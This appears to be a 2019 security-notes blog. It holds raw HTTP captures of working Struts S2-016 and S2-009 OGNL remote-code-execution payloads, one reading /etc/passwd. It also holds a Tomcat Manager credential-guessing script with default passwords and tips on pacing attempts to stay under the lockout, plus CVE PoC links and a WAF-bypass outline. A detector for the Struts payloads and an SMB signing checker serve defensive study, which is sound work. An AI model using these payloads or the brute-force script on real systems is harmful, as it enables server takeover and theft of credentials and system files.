September 11, 2019
Struts S2-016 HTTP raw text

Exploit request:

POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 651

redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/sh','-c','cat+/etc/passwd'})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D=

The OGNL expression sits in the parameter name behind the redirect: prefix (the value is empty). It spawns /bin/sh -c 'cat /etc/passwd' through ProcessBuilder and writes the process output into the HTTP response.

Response:

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 07:07:30 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/
Content-Language: zh-CN

679
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
[…]
September 11, 2019
Struts S2-009 HTTP raw text

Body:

POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 444

class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22webpath%22%29%2c%23outstr.println%28%22888888%22%29%2c%23outstr.close%28%29%29%28meh%29&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d=

The second parameter name, z[(class.classLoader.jarPath)('meh')], makes the parameters interceptor evaluate the value of class.classLoader.jarPath as OGNL. That value disables denyMethodExecution, enables static method access, and prints the marker string "webpath888888" into the response, which is what confirms execution below.

Response:

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 04:00:24 GMT
Content-Length: 15
Connection: keep-alive
Set-Cookie: JSESSIONID=16985C7B820E22E13767E10B8AD57496-n1; Path=/
Content-Language: zh-CN

webpath888888
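Both captures above (S2-016 and S2-009) put the OGNL payload where a value-only inspection never looks: in the parameter name. The detector below is an added example written for this page, not code from the original post or from Struts. It splits a raw HTTP request into query-string and form parameters, flags the S2-016 redirect:/redirectAction: prefix only when the name also carries an OGNL expression, flags the S2-009 name[(expr)(...)] shape and the class.classLoader prefix, and separately reports OGNL fragments seen in either name or value. The three sample requests are constructed, with payloads trimmed from the captures.

```python
"""Detect S2-016 / S2-009 style OGNL injection in raw HTTP requests.

Added example, not from the original post. Parameter *names* are inspected
because both captures carry the payload there.
"""
import re
from urllib.parse import parse_qsl

# S2-016: DefaultActionMapper evaluates parameter names with these prefixes as OGNL.
S2_016_PREFIXES = ("redirect:", "redirectaction:")
# S2-009: a name shaped like x[(expr)(...)] makes ParametersInterceptor evaluate
# expr, which names a sibling parameter whose value holds the OGNL payload.
S2_009_NAME = re.compile(r"\[\s*\(.+\)\s*\(.+\)\s*\]")
# OGNL fragments present in the two captures: context/member-access tampering,
# static method access (@class@method) and process spawning.
OGNL_MARKERS = re.compile(
    r"#_memberAccess|#context\b|denyMethodExecution|allowStaticMethodAccess|"
    r"@[\w.]+@\w+|java\.lang\.(?:ProcessBuilder|Runtime)",
    re.IGNORECASE,
)


def split_request(raw):
    """Return (method, query_string, body) from a raw HTTP/1.1 request."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    request_line = head.split("\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    _path, _, query = target.partition("?")
    return method, query, body


def find_ognl(raw):
    """Return a list of (tag, parameter_name) findings for one raw request."""
    _method, query, body = split_request(raw)
    # keep_blank_values: the S2-016 parameter has an empty value and must survive.
    params = parse_qsl(query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:  # parse_qsl already percent-decodes both
        lowered = name.lower()
        if lowered.startswith(S2_016_PREFIXES) and ("${" in name or "%{" in name):
            findings.append(("S2-016", name))
        if lowered.startswith("class.classloader") or S2_009_NAME.search(name):
            findings.append(("S2-009", name))
        if OGNL_MARKERS.search(name + "=" + value):
            findings.append(("OGNL", name))
    return findings


def tags(raw):
    """Set of finding tags for a request (empty set means nothing matched)."""
    return {tag for tag, _name in find_ognl(raw)}


# Constructed samples modelled on the two captures above (payloads trimmed).
S2_016_REQUEST = (
    "POST /login.action HTTP/1.1\r\n"
    "Host: 192.168.198.133\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher."
    "HttpServletResponse%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang."
    "String[]{'/bin/sh','-c','id'})).start%28%29%7D="
)
S2_009_REQUEST = (
    "POST /login.action HTTP/1.1\r\n"
    "Host: 192.168.198.133\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution"
    "%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStatic"
    "MethodAccess%22%5d%3dtrue%29%28meh%29"
    "&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d="
)
# A plain redirect: prefix without an OGNL expression is an open-redirect concern,
# but it is not the S2-016 pattern, so it is deliberately not tagged here.
BENIGN_REQUEST = (
    "POST /login.action?redirect:/index.jsp= HTTP/1.1\r\n"
    "Host: 192.168.198.133\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=admin&password=Passw0rd"
)

if __name__ == "__main__":
    for label, req in (("S2-016", S2_016_REQUEST), ("S2-009", S2_009_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, find_ognl(req))
```

Run the same function over reconstructed requests from a proxy or WAF log; a rule engine that only decodes and inspects values will pass the S2-016 request, because its value is empty.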
September 11, 2019
Wireshark: commonly used filters | Wireshark frequently used filters
September 11, 2019
CVE-2019-0788 Microsoft Remote Desktop Client remote arbitrary code execution

Body: when the mstsc client connects to a malicious RDP server, the server can execute code on the client.

Uses: internal-network phishing; striking back from a honeypot.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0788
https://www.tenable.com/blog/microsofts-september-2019-patch-tuesday-tenable-roundup
September 11, 2019
CVE-2019-1003000 (Script Security plugin sandbox bypass) Jenkins RCE PoC or simple pre-auth remote code execution on the server

Body: https://medium.com/@valeriyshevchenko/jenkins-rce-poc-or-simple-pre-auth-remote-code-execution-on-the-server-d18b868a77cb
September 10, 2019
[Nessus] SMB Signing not required

Vulnerability details: SMB Signing not required, https://www.tenable.com/plugins/nessus/57608

Fix (Windows Server 2008 R2 as the example):
1. Back up the registry (select the root Computer node and export).
2. Run the registry editor (regedit.exe / Regedt32.exe).
3. Open HKEY_LOCAL_MACHINE, then System\CurrentControlSet\Services\LanManServer\Parameters.
4. Add the following values under that key:
Value Name: EnableSecuritySignature
Data Type: REG_DWORD
Data: 0 (disable), 1 (enable)
NOTE: The default is 0 (disable)
Name: RequireSecuritySignature […]
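The registry change above is the server-side fix; the way to confirm it, and the way the Nessus plugin observes it, is the SecurityMode field of the SMB2 NEGOTIATE response (bit 0x02, SMB2_NEGOTIATE_SIGNING_REQUIRED). Note that SMB2 and later only honour RequireSecuritySignature; EnableSecuritySignature is ignored by the SMB2 server. The script below is an added example written for this page, not code from the original post or from Tenable. It builds a minimal SMB2 NEGOTIATE (dialects 2.0.2 and 2.1, no negotiate contexts), parses the response, and reports whether signing is required; the two RESPONSE_* byte strings are constructed so the parser can be exercised offline, and check_host() is the live check against TCP/445.

```python
"""Check whether an SMB2 server requires signing (Nessus 57608 condition).

Added example, not from the original post. Wire layout is the SMB2 NEGOTIATE
request/response from MS-SMB2; only the fields the check needs are filled in.
"""
import socket
import struct
import uuid

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

# SMB2 header (64 bytes): ProtocolId, StructureSize, CreditCharge, Status, Command,
# CreditRequest, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
SMB2_HEADER = "<4sHHIHHIIQIIQ16s"


def _netbios(msg):
    # NetBIOS session service header: zero byte + 3-byte big-endian length
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def build_negotiate_request():
    header = struct.pack(SMB2_HEADER, b"\xfeSMB", 64, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, b"\0" * 16)
    dialects = [0x0202, 0x0210]
    # NEGOTIATE request body: StructureSize (36), DialectCount, SecurityMode
    # (client advertises signing enabled), Reserved, Capabilities, ClientGuid,
    # ClientStartTime, then the dialect list
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SMB2_NEGOTIATE_SIGNING_ENABLED,
                       0, 0, uuid.uuid4().bytes, 0)
    body += struct.pack("<%dH" % len(dialects), *dialects)
    return _netbios(header + body)


def parse_security_mode(response):
    """Return the SecurityMode field of an SMB2 NEGOTIATE response.

    Layout: 4-byte NetBIOS header, 64-byte SMB2 header, then a body whose
    StructureSize is 65 and whose SecurityMode is the next 16-bit field.
    """
    if len(response) < 4 + 64 + 4:
        raise ValueError("short response")
    smb = response[4:]
    if smb[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message (SMB1-only server?)")
    status = struct.unpack_from("<I", smb, 8)[0]
    if status != 0:
        raise ValueError("NEGOTIATE failed, NTSTATUS 0x%08x" % status)
    structure_size, security_mode = struct.unpack_from("<HH", smb, 64)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % structure_size)
    return security_mode


def signing_required(security_mode):
    return bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)


def check_host(host, port=445, timeout=5):
    """Live check: True when the server sets SIGNING_REQUIRED."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        data = s.recv(4096)
    return signing_required(parse_security_mode(data))


def _make_response(security_mode):
    # Constructed NEGOTIATE response: header Flags=1 (SERVER_TO_REDIR), body
    # StructureSize=65, SecurityMode, DialectRevision=0x0210; the rest is omitted.
    header = struct.pack(SMB2_HEADER, b"\xfeSMB", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHH", 65, security_mode, 0x0210)
    return _netbios(header + body)


RESPONSE_SIGNING_OPTIONAL = _make_response(SMB2_NEGOTIATE_SIGNING_ENABLED)
RESPONSE_SIGNING_REQUIRED = _make_response(
    SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        print(target, "signing required:", check_host(target))
    else:
        for name, r in (("optional", RESPONSE_SIGNING_OPTIONAL), ("required", RESPONSE_SIGNING_REQUIRED)):
            print(name, signing_required(parse_security_mode(r)))
```

A server that answers only with SMB1 (ProtocolId \xffSMB) fails the SMB2 check above; for that case the signing flags live in the SMB1 NEGOTIATE response instead, which this example does not parse.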
September 10, 2019
Using honeypots to capture in-the-wild IoT botnet worm samples and 0-days

Related information

Author: Qihoo 360 Netlab, Ye Genshen (叶根深)
https://github.com/zom3y3
https://twitter.com/zom3y3

Related public talks:
KCon 2019: How to hunt advanced malware threats in IoT environments
https://drive.google.com/file/d/1H_NX2L3KebS9-f1oPS8IbVg9CfWuOj4U/view
KCon 2016: The passionate years of botnet attack-and-defense
https://github.com/zom3y3/slides/blob/master/%5BKCon%202016%5D0828_9_b1t_%E4%B8%8E%E5%83%B5%E5%B0%B8%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AF%B9%E6%8A%97%E7%9A%84%E6%BF%80%E6%83%85%E5%B2%81%E6%9C%88.pdf

Open-source honeypot:
https://hfish.io/docs/#/plug/use
September 10, 2019
Tomcat 8 Manager user credential enumeration

HTTP exchange analysis. The Manager uses HTTP Basic Auth; the request carries the credentials base64-encoded in the Authorization header:

GET /manager/html HTTP/1.1
Host: 192.168.198.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Authorization: Basic dG9tY2F0OnRvbWNhdA==

Response headers on successful authentication:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 UTC
Set-Cookie: JSESSIONID=1CA160B50A85CD4F22555D92B051B7C9; Path=/manager; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Tue, […]
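The enumeration itself is just replaying the request above with different Authorization values and reading the status code. The script below is an added example written for this page, not code from the original post or from Tomcat. It encodes and decodes the Basic header (the token in the capture decodes to tomcat:tomcat), classifies the Manager's answer (200 authenticated with manager-gui, 403 authenticated but missing the role, 401 rejected), and walks a candidate list. The candidate pairs are assumptions drawn from the tomcat-users.xml examples and common wordlists; replace them with your own.

```python
"""Tomcat Manager HTTP Basic credential check.

Added example, not from the original post. Status mapping assumes the default
Manager setup: 200 = valid with manager-gui, 403 = valid user without the
role, 401 = rejected by the realm.
"""
import base64
import http.client
import time


def basic_auth_header(user, password):
    """Authorization header value, as in the captured request."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def decode_basic(header_value):
    """Recover (user, password) from a captured Authorization header."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic auth")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def classify(status):
    """Map the Manager's HTTP status to a verdict on the credential pair."""
    return {200: "valid", 403: "valid-no-manager-role", 401: "invalid"}.get(
        status, "unexpected-%d" % status)


def try_credential(host, port, user, password, path="/manager/html", timeout=5):
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={
            "Authorization": basic_auth_header(user, password),
            "User-Agent": "Mozilla/5.0",
        })
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return classify(resp.status)
    finally:
        conn.close()


# Hypothetical candidate list (assumption): tomcat-users.xml sample accounts and
# a few wordlist staples. Not from the original post.
CANDIDATES = [
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", "admin"),
    ("role1", "tomcat"),
    ("both", "tomcat"),
]


def enumerate_credentials(host, port, candidates=CANDIDATES, delay=0.0):
    """Try each pair once, stopping at the first 200.

    Tomcat's default server.xml wraps the user database in a LockOutRealm
    (5 failures within the window locks the account for 300 s), and a locked
    account answers 401 even to the right password, so keep attempts per user
    low and space them out with `delay`.
    """
    results = {}
    for user, password in candidates:
        verdict = try_credential(host, port, user, password)
        results[(user, password)] = verdict
        if verdict == "valid":
            break
        time.sleep(delay)
    return results


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    for pair, verdict in enumerate_credentials(host, port, delay=1.0).items():
        print(pair, verdict)
```

A 403 is worth recording separately from a 401: it proves the password, and the same account may hold a different role (manager-script, manager-jmx) that gives another path in.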
September 9, 2019
Building a Passive DNS service from Rapid7's public data

Body:
1. https://dns.bufferover.run/dns?q=baidu.com
2. https://github.com/erbbysam/DNSGrep
September 9, 2019
WAF attack and defense research: bypassing WAF at four levels

Abstract

Research into WAF bypass techniques is an essential part of WAF attack/defense research, and also the most interesting part, so in writing about WAF attack and defense I start with the attack side. As the old saying goes, "know the attack before you know the defense": if you do not even know how to bypass a WAF, how can you guarantee that it protects the backend services? In my view, research into WAF bypass techniques will keep pushing the level of defense upward.

Earlier WAF bypass articles read more like collections of cases, all focused on the rule-matching level. Bypassing WAF rules is a head-on fight and the weakest approach; concentrating only on rule-level bypasses narrows the view and hides the WAF's problems elsewhere, and by the barrel principle defensive capability does not fundamentally improve. This article explains WAF bypass techniques at four levels, to raise the WAF's defensive capability across the board. After the attack techniques, later articles will discuss WAF design architecture and defense strategy, so that each design consideration is shown to be meaningful.

- Bypassing WAF at the architecture level.
- Bypassing WAF from the resource-limit angle.
- Bypassing WAF at the protocol level.
- Bypassing WAF through rule defects.

References
https://weibo.com/ttarticle/p/show?id=2309404007261092631700&display=0&retcode=6102